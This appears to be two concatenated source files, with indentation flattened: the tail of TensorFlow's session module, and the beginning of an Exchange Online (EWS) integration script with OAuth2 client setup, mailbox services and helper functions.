# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(log_device_placement=True, allow_soft_placement= True, gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
EWSO365.py
|
import random
import string
from typing import Dict
import dateparser
import chardet
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import sys
import traceback
import json
import os
import hashlib
from io import StringIO
import logging
import warnings
import email
from requests.exceptions import ConnectionError
from collections import deque
from multiprocessing import Process
import exchangelib
from exchangelib.errors import (
ErrorItemNotFound,
ResponseMessageError,
RateLimitError,
ErrorInvalidIdMalformed,
ErrorFolderNotFound,
ErrorMailboxStoreUnavailable,
ErrorMailboxMoveInProgress,
ErrorNameResolutionNoResults,
MalformedResponseError,
)
from exchangelib.items import Item, Message, Contact
from exchangelib.services.common import EWSService, EWSAccountService
from exchangelib.util import create_element, add_xml_child, MNS, TNS
from exchangelib import (
IMPERSONATION,
Account,
EWSDateTime,
EWSTimeZone,
Configuration,
FileAttachment,
Version,
Folder,
HTMLBody,
Body,
ItemAttachment,
OAUTH2,
OAuth2AuthorizationCodeCredentials,
Identity,
ExtendedProperty
)
from oauthlib.oauth2 import OAuth2Token
from exchangelib.version import EXCHANGE_O365
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
# Ignore warnings print to stdout
warnings.filterwarnings("ignore")
""" Constants """
APP_NAME = "ms-ews-o365"
FOLDER_ID_LEN = 120
MAX_INCIDENTS_PER_FETCH = 50
FETCH_TIME = demisto.params().get('fetch_time') or '10 minutes'
# move results
MOVED_TO_MAILBOX = "movedToMailbox"
MOVED_TO_FOLDER = "movedToFolder"
# item types
FILE_ATTACHMENT_TYPE = "FileAttachment"
ITEM_ATTACHMENT_TYPE = "ItemAttachment"
ATTACHMENT_TYPE = "attachmentType"
TOIS_PATH = "/root/Top of Information Store/"
# context keys
ATTACHMENT_ID = "attachmentId"
ATTACHMENT_ORIGINAL_ITEM_ID = "originalItemId"
NEW_ITEM_ID = "newItemId"
MESSAGE_ID = "messageId"
ITEM_ID = "itemId"
ACTION = "action"
MAILBOX = "mailbox"
MAILBOX_ID = "mailboxId"
FOLDER_ID = "id"
TARGET_MAILBOX = 'receivedBy'
# context paths
CONTEXT_UPDATE_EWS_ITEM = f"EWS.Items((val.{ITEM_ID} === obj.{ITEM_ID} || " \
f"(val.{MESSAGE_ID} && obj.{MESSAGE_ID} && val.{MESSAGE_ID} === obj.{MESSAGE_ID}))" \
f" && val.{TARGET_MAILBOX} === obj.{TARGET_MAILBOX})"
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT = "EWS.Items(val.{0} == obj.{1})".format(
ITEM_ID, ATTACHMENT_ORIGINAL_ITEM_ID
)
CONTEXT_UPDATE_ITEM_ATTACHMENT = ".ItemAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FILE_ATTACHMENT = ".FileAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FOLDER = "EWS.Folders(val.{0} == obj.{0})".format(FOLDER_ID)
# fetch params
LAST_RUN_TIME = "lastRunTime"
LAST_RUN_IDS = "ids"
LAST_RUN_FOLDER = "folderName"
ERROR_COUNTER = "errorCounter"
# headers
ITEMS_RESULTS_HEADERS = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"textBody",
]
UTF_8 = 'utf-8'
""" Classes """
class ProxyAdapter(requests.adapters.HTTPAdapter):
"""
Proxy Adapter used to add PROXY to requests
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class InsecureProxyAdapter(NoVerifyHTTPAdapter):
"""
Insecure Proxy Adapter used to add PROXY and INSECURE to requests
NoVerifyHTTPAdapter is a built-in insecure HTTPAdapter class
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class EWSClient:
def __init__(
self,
default_target_mailbox,
client_id,
client_secret,
tenant_id,
folder="Inbox",
is_public_folder=False,
request_timeout="120",
max_fetch=MAX_INCIDENTS_PER_FETCH,
self_deployed=True,
insecure=True,
proxy=False,
**kwargs,
):
"""
Client used to communicate with EWS
:param default_target_mailbox: Email address from which to fetch incidents
:param client_id: Application client ID
:param client_secret: Application client secret
:param folder: Name of the folder from which to fetch incidents
:param is_public_folder: Public Folder flag
:param request_timeout: Timeout (in seconds) for HTTP requests to Exchange Server
:param max_fetch: Max incidents per fetch
:param insecure: Trust any certificate (not secure)
"""
BaseProtocol.TIMEOUT = int(request_timeout)
self.ews_server = "https://outlook.office365.com/EWS/Exchange.asmx/"
self.ms_client = MicrosoftClient(
tenant_id=tenant_id,
auth_id=client_id,
enc_key=client_secret,
app_name=APP_NAME,
base_url=self.ews_server,
verify=not insecure,
proxy=proxy,
self_deployed=self_deployed,
scope="https://outlook.office.com/.default",
)
self.folder_name = folder
self.is_public_folder = is_public_folder
self.access_type = kwargs.get('access_type') or IMPERSONATION
self.max_fetch = min(MAX_INCIDENTS_PER_FETCH, int(max_fetch))
self.last_run_ids_queue_size = 500
self.client_id = client_id
self.client_secret = client_secret
self.account_email = default_target_mailbox
self.config = self.__prepare(insecure)
self.protocol = BaseProtocol(self.config)
def __prepare(self, insecure):
"""
Prepares the client PROTOCOL, CREDENTIALS and CONFIGURATION
:param insecure: Trust any certificate (not secure)
:return: OAuth 2 Configuration
"""
BaseProtocol.HTTP_ADAPTER_CLS = InsecureProxyAdapter if insecure else ProxyAdapter
access_token = self.ms_client.get_access_token()
oauth2_token = OAuth2Token({"access_token": access_token})
self.credentials = credentials = OAuth2AuthorizationCodeCredentials(
client_id=self.client_id,
client_secret=self.client_secret,
access_token=oauth2_token,
)
# need to add identity for protocol OAuth header
self.credentials.identity = Identity(upn=self.account_email)
config_args = {
"credentials": credentials,
"auth_type": OAUTH2,
"version": Version(EXCHANGE_O365),
"service_endpoint": "https://outlook.office365.com/EWS/Exchange.asmx",
}
return Configuration(**config_args)
def get_account(self, target_mailbox=None):
"""
Request an account from EWS
:param (Optional) target_mailbox: Mailbox associated with the requested account
:return: exchangelib Account
"""
if not target_mailbox:
target_mailbox = self.account_email
return Account(
primary_smtp_address=target_mailbox,
autodiscover=False,
config=self.config,
access_type=self.access_type,
)
def get_items_from_mailbox(self, account, item_ids):
"""
Request specific items from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_ids: item_ids of the requested items
:return: list of exchangelib Items
"""
# allow user to pass target_mailbox as account
if isinstance(account, str):
account = self.get_account(account)
else:
account = self.get_account(self.account_email)
if type(item_ids) is not list:
item_ids = [item_ids]
items = [Item(id=x) for x in item_ids]
result = list(account.fetch(ids=items))
result = [x for x in result if not isinstance(x, ErrorItemNotFound)]
if len(result) != len(item_ids):
raise Exception(
"One or more items were not found. Check the input item ids"
)
return result
def get_item_from_mailbox(self, account, item_id):
"""
Request a single item from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_id: item_id of the requested item
:return: exchangelib Item
"""
result = self.get_items_from_mailbox(account, [item_id])
if len(result) == 0:
raise Exception(f"ItemId {str(item_id)} not found")
return result[0]
def get_attachments_for_item(self, item_id, account, attachment_ids=None):
"""
Request attachments for an item
:param item_id: item_id of the item to retrieve attachments from
:param account: EWS account or target_mailbox associated with that account
:param (Optional) attachment_ids: attachment_ids: attachment_ids to retrieve
:return: list of exchangelib Item.attachments
"""
item = self.get_item_from_mailbox(account, item_id)
attachments = []
attachment_ids = argToList(attachment_ids)
if item:
if item.attachments:
for attachment in item.attachments:
if (
attachment_ids
and attachment.attachment_id.id not in attachment_ids
):
continue
attachments.append(attachment)
else:
raise Exception("Message item not found: " + item_id)
if attachment_ids and len(attachments) < len(attachment_ids):
raise Exception(
"Some attachment id did not found for message:" + str(attachment_ids)
)
return attachments
def is_default_folder(self, folder_path, is_public=None):
"""
Is the given folder_path public
:param folder_path: folder path to check if is public
:param is_public: (Optional) if provided, will return this value
:return: Boolean
"""
if is_public is not None:
return is_public
if folder_path == self.folder_name:
return self.is_public_folder
return False
def get_folder_by_path(self, path, account=None, is_public=False):
"""
Retrieve folder by path
:param path: path of the folder
:param account: account associated with the requested path
:param is_public: is the requested folder public
:return: exchangelib Folder
"""
if account is None:
account = self.get_account()
# handle exchange folder id
if len(path) == FOLDER_ID_LEN:
folders_map = account.root._folders_map
if path in folders_map:
return account.root._folders_map[path]
if is_public:
folder_result = account.public_folders_root
elif path == "AllItems":
folder_result = account.root
else:
folder_result = account.inbox.parent # Top of Information Store
path = path.replace("/", "\\")
path = path.split("\\")
for sub_folder_name in path:
folder_filter_by_name = [
x
for x in folder_result.children
if x.name.lower() == sub_folder_name.lower()
]
if len(folder_filter_by_name) == 0:
raise Exception(f"No such folder {path}")
folder_result = folder_filter_by_name[0]
return folder_result
def send_email(self, message: Message):
account = self.get_account()
message.account = account
message.send_and_save()
class MarkAsJunk(EWSAccountService):
"""
EWSAccountService class used for marking items as junk
"""
SERVICE_NAME = "MarkAsJunk"
def call(self, item_id, move_item):
elements = list(
self._get_elements(
payload=self.get_payload(item_id=item_id, move_item=move_item)
)
)
for element in elements:
if isinstance(element, ResponseMessageError):
return str(element)
return "Success"
def get_payload(self, item_id, move_item):
junk = create_element(
f"m:{self.SERVICE_NAME}",
{"IsJunk": "true", "MoveItem": "true" if move_item else "false"},
)
items_list = create_element("m:ItemIds")
item_element = create_element("t:ItemId", {"Id": item_id})
items_list.append(item_element)
junk.append(items_list)
return junk
class GetSearchableMailboxes(EWSService):
"""
EWSAccountService class used for getting Searchable Mailboxes
"""
SERVICE_NAME = "GetSearchableMailboxes"
element_container_name = f"{{{MNS}}}SearchableMailboxes"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}PrimarySmtpAddress").text
if element.find(f"{{{TNS}}}PrimarySmtpAddress") is not None
else None,
MAILBOX_ID: element.find(f"{{{TNS}}}ReferenceId").text
if element.find(f"{{{TNS}}}ReferenceId") is not None
else None,
"displayName": element.find(f"{{{TNS}}}DisplayName").text
if element.find(f"{{{TNS}}}DisplayName") is not None
else None,
"isExternal": element.find(f"{{{TNS}}}IsExternalMailbox").text
if element.find(f"{{{TNS}}}IsExternalMailbox") is not None
else None,
"externalEmailAddress": element.find(f"{{{TNS}}}ExternalEmailAddress").text
if element.find(f"{{{TNS}}}ExternalEmailAddress") is not None
else None,
}
def call(self):
elements = self._get_elements(payload=self.get_payload())
return [
self.parse_element(x)
for x in elements
if x.find(f"{{{TNS}}}ReferenceId").text
]
def get_payload(self):
element = create_element(f"m:{self.SERVICE_NAME}")
return element
class ExpandGroup(EWSService):
"""
EWSAccountService class used for expanding groups
"""
SERVICE_NAME = "ExpandDL"
element_container_name = f"{{{MNS}}}DLExpansion"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}EmailAddress").text
if element.find(f"{{{TNS}}}EmailAddress") is not None
else None,
"displayName": element.find(f"{{{TNS}}}Name").text
if element.find(f"{{{TNS}}}Name") is not None
else None,
"mailboxType": element.find(f"{{{TNS}}}MailboxType").text
if element.find(f"{{{TNS}}}MailboxType") is not None
else None,
}
def call(self, email_address, recursive_expansion=False):
try:
if recursive_expansion == "True":
group_members: Dict = {}
self.expand_group_recursive(email_address, group_members)
return list(group_members.values())
else:
return self.expand_group(email_address)
except ErrorNameResolutionNoResults:
demisto.results("No results were found.")
sys.exit()
def get_payload(self, email_address):
element = create_element(f"m:{self.SERVICE_NAME}")
mailbox_element = create_element("m:Mailbox")
add_xml_child(mailbox_element, "t:EmailAddress", email_address)
element.append(mailbox_element)
return element
def expand_group(self, email_address):
"""
Expand given group
:param email_address: email address of the group to expand
:return: list dict with parsed expanded group data
"""
elements = self._get_elements(payload=self.get_payload(email_address))
return [self.parse_element(x) for x in elements]
def expand_group_recursive(self, email_address, non_dl_emails, dl_emails=None):
"""
Expand group recursively
:param email_address: email address of the group to expand
:param non_dl_emails: non distribution only emails
:param dl_emails: (Optional) distribution only emails
:return: Set of dl emails and non dl emails (returned via reference)
"""
if dl_emails is None:
dl_emails = set()
if email_address in non_dl_emails or email_address in dl_emails:
return None
dl_emails.add(email_address)
for member in self.expand_group(email_address):
if (
member["mailboxType"] == "PublicDL"
or member["mailboxType"] == "PrivateDL"
):
self.expand_group_recursive(member.get("mailbox"), non_dl_emails, dl_emails)
else:
if member["mailbox"] not in non_dl_emails:
non_dl_emails[member["mailbox"]] = member
# If you are modifying this probably also need to modify in other files
def exchangelib_cleanup():
key_protocols = list(exchangelib.protocol.CachingProtocol._protocol_cache.items())
try:
exchangelib.close_connections()
except Exception as ex:
demisto.error("Error was found in exchangelib cleanup, ignoring: {}".format(ex))
for key, protocol in key_protocols:
try:
if "thread_pool" in protocol.__dict__:
demisto.debug(
"terminating thread pool key{} id: {}".format(
key, id(protocol.thread_pool)
)
)
protocol.thread_pool.terminate()
del protocol.__dict__["thread_pool"]
else:
demisto.info(
"Thread pool not found (ignoring terminate) in protcol dict: {}".format(
dir(protocol.__dict__)
)
)
except Exception as ex:
demisto.error("Error with thread_pool.terminate, ignoring: {}".format(ex))
""" LOGGING """
log_stream = None
log_handler = None
def start_logging():
global log_stream
global log_handler
logging.raiseExceptions = False
if log_stream is None:
log_stream = StringIO()
log_handler = logging.StreamHandler(stream=log_stream)
log_handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logger = logging.getLogger()
logger.addHandler(log_handler)
logger.setLevel(logging.DEBUG)
""" Helper Functions """
def get_attachment_name(attachment_name):
"""
Retrieve attachment name or error string if none is provided
:param attachment_name: attachment name to retrieve
:return: string
"""
if attachment_name is None or attachment_name == "":
return "demisto_untitled_attachment"
return attachment_name
def get_entry_for_object(title, context_key, obj, headers=None):
"""
Create an entry for a given object
:param title: Title of the human readable
:param context_key: Context key used for entry context
:param obj: Object to create entry for
:param headers: (Optional) headers used in the tableToMarkDown
:return: Entry object to be used with demisto.results()
"""
if len(obj) == 0:
return "There is no output results"
if headers and isinstance(obj, dict):
headers = list(set(headers).intersection(set(obj.keys())))
return {
"Type": entryTypes["note"],
"Contents": obj,
"ContentsFormat": formats["json"],
"ReadableContentsFormat": formats["markdown"],
"HumanReadable": tableToMarkdown(title, obj, headers),
"EntryContext": {context_key: obj},
}
def prepare_args(args):
"""
Prepare arguments to be used as the API expects it
:param args: demisto args
:return: transformed args
"""
args = dict((k.replace("-", "_"), v) for k, v in list(args.items()))
if "is_public" in args:
args["is_public"] = args["is_public"] == "True"
return args
def get_limited_number_of_messages_from_qs(qs, limit):
"""
Retrieve a limited number of messages from query search
:param qs: query search to execute
:param limit: limit on number of items to retrieve from search
:return: list of exchangelib.Message
"""
count = 0
results = []
for item in qs:
if count == limit:
break
if isinstance(item, Message):
count += 1
results.append(item)
return results
def keys_to_camel_case(value):
"""
Transform keys from snake to camel case (does nothing if no snakes are found)
:param value: value to transform
:return: transformed value
"""
def str_to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if value is None:
return None
if isinstance(value, (list, set)):
return list(map(keys_to_camel_case, value))
if isinstance(value, dict):
return dict(
(
keys_to_camel_case(k),
keys_to_camel_case(v) if isinstance(v, (list, dict)) else v,
)
for (k, v) in list(value.items())
)
return str_to_camel_case(value)
def get_last_run(client: EWSClient, last_run=None):
"""
Retrieve the last run time
